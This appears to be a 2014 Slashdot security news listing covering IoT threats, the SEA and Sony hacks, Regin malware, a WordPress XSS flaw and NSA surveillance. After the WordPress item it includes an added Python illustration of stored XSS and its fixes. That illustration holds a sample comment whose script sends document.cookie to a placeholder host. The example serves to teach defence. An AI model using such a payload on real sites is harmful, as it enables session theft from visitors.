
  • Security Experts Believe the Internet of Things Will Be Used To Kill Someone

    dcblogs writes: Imagine a fleet of quad copters or drones equipped with explosives and controlled by terrorists. Or someone who hacks into a connected insulin pump and changes the settings in a lethal way. Or maybe the hacker who accesses a building's furnace and thermostat controls and runs the furnace full bore until a fire is started. Those may all sound like plot material for a James Bond movie, but there are security experts who now believe, as does Jeff Williams, CTO of Contrast Security, that "the Internet of Things will kill someone". Today, there is a new "rush to connect things" and "it is leading to very sloppy engineering from a security perspective," said Williams. Similarly, Rashmi Knowles, chief security architect at RSA, imagines criminals hacking into medical devices, recently blogged about hackers using pacemakers to blackmail users, and asked: "Question is, when is the first murder?"

    95 comments | 3 hours ago

  • Syrian Electronic Army Takes Credit For News Site Hacking

    New submitter ddtmm writes The Syrian Electronic Army is claiming responsibility for the hacking of multiple news websites, including CBC News. Some users trying to access the CBC website reported seeing a pop-up message reading: "You've been hacked by the Syrian Electronic Army (SEA)." It appears the hack targeted a network used by many news organizations and businesses. A tweet from an account appearing to belong to the Syrian Electronic Army suggested the attacks were meant to coincide with the U.S. Thanksgiving on Thursday. The group claimed to have used the domain Gigya.com, a company that offers businesses a customer identity management platform, to hack into other sites via GoDaddy, its domain registrar. Gigya is "trusted by more than 700 leading brands," according to its website. The hacker or hackers redirected sites to the Syrian Electronic Army image that users saw. Gigya's operations team released a statement Thursday morning saying that it identified an issue with its domain registrar at 6:45 a.m. ET. The breach "resulted in the redirect of the Gigya.com domain for a subset of users," the company said. Among the websites known to be hacked so far are New York Times, Chicago Tribune, CNBC, PC World, Forbes, The Telegraph, Walmart and Facebook.

    20 comments | yesterday

  • Uber's Android App Caught Reporting Data Back Without Permission

    Zothecula writes Security researcher GironSec has pulled Uber's Android app apart and discovered that it's sending a huge amount of personal data back to base – including your call logs, what apps you've got installed, whether your phone is vulnerable to certain malware, whether your phone is rooted, and your SMS and MMS logs, which it explicitly doesn't have permission to do. It's the latest in a series of big-time missteps for a company whose core business model is, frankly, illegal in most of its markets as well.

    221 comments | yesterday

  • Ask Slashdot: Best Biometric Authentication System?

    kwelch007 writes I run a network for a company that does manufacturing primarily in a clean-room. We have many systems in place that track countless aspects of every step. However, we do not have systems in place to identify the specific user performing the step. I could do this easily, but asking users to input their AD login every time they perform a task is a time-waster (we have "shared" workstations throughout.) My question is, what technologies are people actually using successfully for rapid authentication? I've thought about fingerprint scanners, but they don't work because in the CR we have to wear gloves. So, I'm thinking either face-recognition or retinal scans...but am open to other ideas if they are commercially viable.

    125 comments | 2 days ago

  • Bitcoin Is Not Anonymous After All

    Taco Cowboy points out a new study that shows it is possible to figure out the IP address of someone who pays for transactions anonymously online using bitcoins. "The Bitcoin system is not managed by a central authority, but relies on a peer-to-peer network on the Internet. Anyone can join the network as a user or provide computing capacity to process the transactions. In the network, the user's identity is hidden behind a cryptographic pseudonym, which can be changed as often as is wanted. Transactions are signed with this pseudonym and broadcast to the public network to verify their authenticity and attribute the Bitcoins to the new owner. In their new study, researchers at the Laboratory of Algorithmics, Cryptology and Security of the University of Luxembourg have shown that Bitcoin does not protect users' IP addresses and that they can be linked to the users' transactions in real-time. To find this out, a hacker would need only a few computers and about €1500 per month for server and traffic costs. Moreover, the popular anonymization network "Tor" can do little to guarantee Bitcoin users' anonymity, since it can be blocked easily."

    114 comments | 2 days ago

  • Clarification on the IP Address Security in Dropbox Case

    Bennett Haselton writes A judge rules that a county has to turn over the IP addresses that were used to access a county mayor's Dropbox account, stating that there is no valid security-related reason why the IP addresses should be exempt from a public records request. I think the judge's conclusion about IP addresses was right, but the reasoning was flawed; here is a technically more correct argument that would have led to the same answer. Keep reading to see what Bennett has to say about the case.

    147 comments | 2 days ago

  • Auto Industry Teams Up With Military To Stop Car Hacking

    An anonymous reader writes: A team of hackers is collaborating with military and industry groups to develop cyber security defenses for commercially available cars, in response to a growing threat from criminals and terrorists. In the U.K., hackers are now responsible for a third of car thefts in London and there are fears that while technology is progressing, older models will remain vulnerable to attack. Although there have been no reported instances of a car being completely commandeered outside of controlled conditions, during tests hackers come out on top every time – unlocking car boots, setting off windscreen wipers, locking brakes, and cutting the engine.

    112 comments | 2 days ago

  • The People Who Are Branding Vulnerabilities

    antdude points out a story at ZDNet about how the naming of security vulnerabilities and exploits has evolved into branding and awareness campaigns. Heartbleed set the trend early this year, having a distinct name and logo to represent a serious security problem. It seemed to work; the underlying bug got massive exposure, even in the mainstream media. This raises a new set of issues — should the response to the disclosure of a vulnerability be dependent on how catchy its name is? No, but it probably will be. Heartbleed charmed the public, and in a way, it was designed to do so. By comparison Shellshock, POODLE (aka the clumsy "Poodlebleed"), Sandworm, the secretively named Rootpipe, Winshock, and other vulns seem like proverbial "red-headed stepchildren" — despite the fact that each of these vulns is a critical issue, some are worse than Heartbleed, and all of them needed fast responses. The next "big bug" after Heartbleed was Shellshock — real name CVE-2014-6271. Shellshock didn't have a company's pocketbook or marketing team behind it. So, despite the fact that many said Shellshock was worse than Heartbleed (rated high on severity but low on complexity, making it easy for attackers), creating a celebrity out of Shellshock faced an uphill climb.

    64 comments | 2 days ago

  • Cameron Accuses Internet Companies Of Giving Terrorists Safe Haven

    An anonymous reader writes with this snippet from The Guardian: "Internet companies are allowing their networks to be used to plot "murder and mayhem", David Cameron has said in response to the official inquiry into the intelligence agencies' actions ahead of the killing of Lee Rigby. He demanded that internet companies live up to their social responsibilities to report potential terror threats and said there was no reason for such firms to be willing to cooperate with state agencies over child abuse but not over combatting terrorism. His comments to the House of Commons came after the parliamentary intelligence and security committee concluded that the brutal murder of Rigby could have been prevented if an internet company had passed on an online exchange in which one of the killers expressed "in the most graphic terms" his intention to carry out an Islamist jihadi attack."

    178 comments | 3 days ago

  • Sony Pictures Computer Systems Shut Down After Ransomware Hack

    MojoKid writes: It appears that Sony Pictures has become the victim of a massive ransomware hack, which has resulted in the company basically shutting down its IT infrastructure. According to an unnamed source, every computer in Sony's New York Office, and every Sony Pictures office across the nation, bears an image from the hacker with the headline "Hacked By #GOP" which is then followed by a warning. The hacker, or group, claims to have obtained corporate secrets and has threatened to reveal those secrets if Sony doesn't meet their demands.

    154 comments | 3 days ago

  • How the Pentagon's Robots Would Automate War

    rossgneumann writes: Pentagon officials are worried that the U.S. military is losing its edge compared to competitors like China, and are willing to explore almost anything to stay on top—including creating robots capable of becoming fighting machines. A 72-page document throws detailed light on the far-reaching implications of the Pentagon's plan to monopolize imminent "transformational advances" in biotechnology, robotics and artificial intelligence, information technology, nanotechnology, and energy.

    116 comments | 3 days ago

  • Regin Malware In EU Attack Linked To US and British Intelligence Agencies

    Advocatus Diaboli writes The Regin malware, whose existence was first reported by the security firm Symantec on Sunday, is among the most sophisticated ever discovered by researchers. Symantec compared Regin to Stuxnet, a state-sponsored malware program developed by the U.S. and Israel to sabotage computers at an Iranian nuclear facility. Sources familiar with internal investigations at Belgacom and the European Union have confirmed to The Intercept that the Regin malware was found on their systems after they were compromised, linking the spy tool to the secret GCHQ and NSA operations.

    129 comments | 3 days ago

  • Google Chrome Will Block All NPAPI Plugins By Default In January

    An anonymous reader writes Google today provided an update on its plan to remove Netscape Plugin Application Programming Interface (NPAPI) from Chrome, which the company says will improve the browser's security, speed, and stability, as well as reduce complexity in the code base. In short, the latest timeline is as follows: Block all plugins by default in January 2015, disable support in April 2015, and remove support completely in September 2015. For context, Google first announced in September 2013 that it was planning to drop NPAPI. At the time, Google said anonymous Chrome usage data showed just six NPAPI plugins were used by more than 5 percent of users, and the company was hoping to remove support from Chrome "before the end of 2014, but the exact timing will depend on usage and user feedback."

    107 comments | 3 days ago

  • DHS Set To Destroy "Einstein" Surveillance Records

    schwit1 sends word that the Department of Homeland Security plans on disposing of all the records from a 3-year-long surveillance program without letting the public have access to them. The Department of Homeland Security is poised to ditch all records from a controversial network monitoring system called "Einstein" that are at least three years old, but not for security reasons. DHS reasons the files — which include data about traffic to government websites, agency network intrusions and general vulnerabilities — have no research significance. But some security experts say, to the contrary, DHS would be deleting a treasure chest of historical threat data. And privacy experts, who wish the metadata wasn't collected at all, say destroying it could eliminate evidence that the government-wide surveillance system does not perform as intended. The National Archives and Records Administration has tentatively approved the disposal plan, pending a public comment period.

    71 comments | 3 days ago

  • Book Review: Bulletproof SSL and TLS

    benrothke writes If SSL is the emperor's new clothes, then Ivan Ristic in Bulletproof SSL and TLS has shown that perhaps the emperor isn't wearing anything at all. There is a perception that if a web site is SSL secured, then it's indeed secure. Read a few pages in this important book, and the SSL = security myth is dispelled. For the first 8 of the 16 chapters, Ristic, one of the greatest practical SSL/TLS experts around, spends 230 pages showing countless weaknesses, vulnerabilities, attacks and other SSL weaknesses. He then spends the next 8 chapters showing how SSL can, if done correctly, be deployed to provide adequate security. Keep reading for the rest of Ben's review.

    90 comments | 3 days ago

  • Nuclear Weapons Create Their Own Security Codes With Radiation

    Zothecula writes "Nuclear weapons are a paradox. No one in their right mind wants to use one, but if they're to act as a deterrent, they need to be accessible. The trick is to make sure that access is only available to those with the proper authority. To prevent a real life General Jack D Ripper from starting World War III, Livermore National Laboratory's (LLNL) Defense Technologies Division is developing a system that uses a nuclear weapon's own radiation to protect itself from tampering."

    104 comments | 4 days ago

  • Highly Advanced Backdoor Trojan Cased High-Profile Targets For Years

    An anonymous reader points out this story at Ars about a new trojan on the scene. Researchers have unearthed highly advanced malware they believe was developed by a wealthy nation-state to spy on a wide range of international targets in diverse industries, including hospitality, energy, airline, and research. Backdoor Regin, as researchers at security firm Symantec are referring to the trojan, bears some resemblance to previously discovered state-sponsored malware, including the espionage trojans known as Flame and Duqu, as well as Stuxnet, the computer worm and trojan that was programmed to disrupt Iran's nuclear program. Regin likely required months or years to be completed and contains dozens of individual modules that allowed its operators to tailor the malware to individual targets.

    142 comments | 4 days ago

  • Critical XSS Flaws Patched In WordPress and Popular Plug-In

    itwbennett writes The WordPress development team on Thursday released critical security updates that address an XSS vulnerability in the comment boxes of WordPress posts and pages. An attacker could exploit this flaw to create comments with malicious JavaScript code embedded in them that would get executed by the browsers of users seeing those comments. 'In the most obvious scenario the attacker leaves a comment containing the JavaScript and some links in order to put the comment in the moderation queue,' said Jouko Pynnonen, the security researcher who found the flaw.

    41 comments | about a week ago
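The WordPress item above describes a stored XSS: a comment containing JavaScript is saved verbatim and then executed by every browser that renders it (including a moderator's, once links push the comment into the moderation queue). The block below is an added illustration of that class of bug and its two standard fixes; it is not WordPress code and does not reproduce Jouko Pynnonen's actual trigger. The comment text, the templates, the allowlist sanitizer and the helper `parsed_tags` are all constructed for this example.

```python
"""Stored XSS in a comment box: the unsafe render beside two fixes.

Added illustration only; not WordPress code and not the researcher's
proof of concept. Everything below is constructed for this example.
"""
import html
from html.parser import HTMLParser

# Constructed attacker comment: JavaScript plus a link, the shape the
# summary describes. Rendered unescaped, the script runs in the reader's
# browser; here it would ship document.cookie to an attacker host.
MALICIOUS_COMMENT = (
    'Nice post! <a href="http://example.invalid/">link</a>'
    '<script>document.location="http://example.invalid/?c="+document.cookie'
    '</script>'
)


def render_unsafe(body):
    """Vulnerable: the stored comment is dropped into HTML verbatim."""
    return f'<li class="comment">{body}</li>'


def render_escaped(body):
    """Fix 1 (plain-text comments): escape on output, so the browser
    receives text, never markup."""
    return f'<li class="comment">{html.escape(body, quote=True)}</li>'


class _Sanitizer(HTMLParser):
    """Fix 2 (comments allowed limited HTML): rebuild the fragment from an
    allowlist of tags/attributes, drop <script>/<style> bodies entirely,
    and escape all text, including text freed from dropped tags."""

    ALLOWED = {"a": {"href"}, "b": set(), "i": set()}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open = []        # allowed tags emitted but not yet closed
        self.skipping = None  # name of the <script>/<style> being dropped

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skipping = tag
            return
        if tag not in self.ALLOWED:
            return            # unknown tag dropped; its inner text is kept
        kept = ""
        for name, value in attrs:
            ok_scheme = value and value.lower().startswith(("http://", "https://"))
            if name in self.ALLOWED[tag] and ok_scheme:  # no javascript: URLs
                kept += f' {name}="{html.escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")
        self.open.append(tag)

    def handle_endtag(self, tag):
        if tag == self.skipping:
            self.skipping = None
        elif tag in self.open:
            while self.open:  # close nested allowed tags in order
                closed = self.open.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if self.skipping is None:
            self.out.append(html.escape(data, quote=True))

    def result(self):
        self.close()
        while self.open:      # terminate tags the comment left open
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize(body):
    p = _Sanitizer()
    p.feed(body)
    return p.result()


def render_sanitized(body):
    return f'<li class="comment">{sanitize(body)}</li>'


class _TagCollector(HTMLParser):
    """Helper: the tags a browser's parser would actually see."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def parsed_tags(fragment):
    c = _TagCollector()
    c.feed(fragment)
    c.close()
    return c.tags


if __name__ == "__main__":
    for name, fn in (("unsafe", render_unsafe), ("escaped", render_escaped),
                     ("sanitized", render_sanitized)):
        print(f"{name:9s} tags seen by parser: {parsed_tags(fn(MALICIOUS_COMMENT))}")
```

The point of `parsed_tags` is that the fix is judged by what the HTML parser produces, not by what the string looks like: the unsafe render yields a live `script` element, the escaped render yields only the wrapping `li`, and the allowlist version keeps the `a` but discards the script and any `javascript:` or event-handler attribute. Escape-on-output is the cheaper fix whenever comments do not need markup.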

  • Top NSA Official Raised Alarm About Metadata Program In 2009

    An anonymous reader sends this report from the Associated Press: "Dissenters within the National Security Agency, led by a senior agency executive, warned in 2009 that the program to secretly collect American phone records wasn't providing enough intelligence to justify the backlash it would cause if revealed, current and former intelligence officials say.

    The NSA took the concerns seriously, and many senior officials shared them. But after an internal debate that has not been previously reported, NSA leaders, White House officials and key lawmakers opted to continue the collection and storage of American calling records, a domestic surveillance program without parallel in the agency's recent history."

    110 comments | about a week ago

  • Obama's Immigration Order To Give Tech Industry Some, Leave 'Em Wanting More

    theodp writes: "The high-tech industry," reports the Washington Post's Nancy Scola, "will have at least two things to be happy about in President Obama's speech outlining executive actions he'll take on immigration. The president plans to grant the tech industry some, but not nearly all, of what it has been after in the immigration debate. The first is aimed at increasing the opportunity for foreign students and recent graduates from U.S. schools to work in high-tech jobs in the United States. And the second is aimed at making it easier for foreign-born entrepreneurs to set up shop in the United States. According to the White House, Obama will direct the Department of Homeland Security to help students in the so-called STEM fields — science, technology, engineering and mathematics — by proposing, per a White House fact sheet released Thursday night, to "expand and extend" the controversial Optional Practical Training program that now allows foreign-born STEM students and recent graduates to remain in the United States for up to 29 months. The exact details of that expansion will be worked out by the Department of Homeland Security as it goes through a rulemaking process."

    186 comments | about a week ago
